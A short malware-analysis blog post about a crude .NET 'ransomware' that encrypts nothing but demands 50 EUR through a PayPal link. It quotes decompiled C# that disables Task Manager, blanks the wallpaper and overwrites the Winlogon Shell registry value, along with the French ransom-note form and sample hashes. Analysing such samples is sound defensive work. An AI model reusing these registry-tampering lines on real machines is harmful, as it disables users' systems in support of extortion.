Funny Paypal Ransomware

- 3 mins
digest ransomware c#net

Today i wanna talk about a funny paypal ransomware that @malwarehunterteam on twitter found

MD5: 21558297004d9fa927bb720a0af8836c

A basic knowledge about the sample image

Moreover it looks like this but it does not encrypts anything. Just set some reg keys:

RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
registryKey.SetValue("DisableTaskMgr", 1, RegistryValueKind.String);

RegistryKey registryKey2 = Registry.CurrentUser.CreateSubKey("Control Panel\\Desktop");
registryKey2.SetValue("Wallpaper", "", RegistryValueKind.String);

RegistryKey registryKey3 = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon");
registryKey3.SetValue("Shell", "empty", RegistryValueKind.String);

Moreover they have shown much creativity in writing ransom note as it’s not a text file, moreover a interactive form

this.groupBox1.Text = "Rançon";
	this.label8.AutoSize = true;
	this.label8.Location = new Point(21, 191);
	this.label8.Name = "label8";
	this.label8.Size = new Size(166, 25);
	this.label8.TabIndex = 4;
	this.label8.Text = "Il Reste 30min...";
	this.label7.AutoSize = true;
	this.label7.Location = new Point(21, 149);
	this.label7.Name = "label7";
	this.label7.Size = new Size(650, 25);
	this.label7.TabIndex = 3;
	this.label7.Text = "Si le Payement n'est pas reçu nous effacerons toutes vos données";
	this.label5.AutoSize = true;
	this.label5.Location = new Point(21, 113);
	this.label5.Name = "label5";
	this.label5.Size = new Size(674, 25);
	this.label5.TabIndex = 2;
	this.label5.Text = "Une Fois que les 50 EUR Paypal sont envoyers nous vous libereront.";
	this.label4.AutoSize = true;
	this.label4.Location = new Point(21, 76);
	this.label4.Name = "label4";
	this.label4.Size = new Size(584, 25);
	this.label4.TabIndex = 1;
	this.label4.Text = "50 EUR PayPal Pour que la rançon se supprime de votre pc";

Paypal link where they asked to pay

[Paypal link: https://www.paypal.com/paypalme/AbsoDev]

Clicking the button redirects to paypal site

private void button1_Click(object sender, EventArgs e)
{
	Process.Start("https://www.paypal.com/paypalme/AbsoDev");
}

Moreover timer is also just a text embed

this.label6.Text = "2j 23h 59min...";

These are all, for the r2l2 ransomware.

Some things about sample

MD5: 21558297004d9fa927bb720a0af8836c SHA256: f6bc8adf88d2fd6d124683176c4b3208ee9d47904482e40e323851ee2d67dfcb

It is 32bit .NET file

Three sections

[Note: If anyone have issue with the digest or blogs ping me up on twitter :), i will take it down]

Related Posts

rss facebook twitter github mail instagram linkedin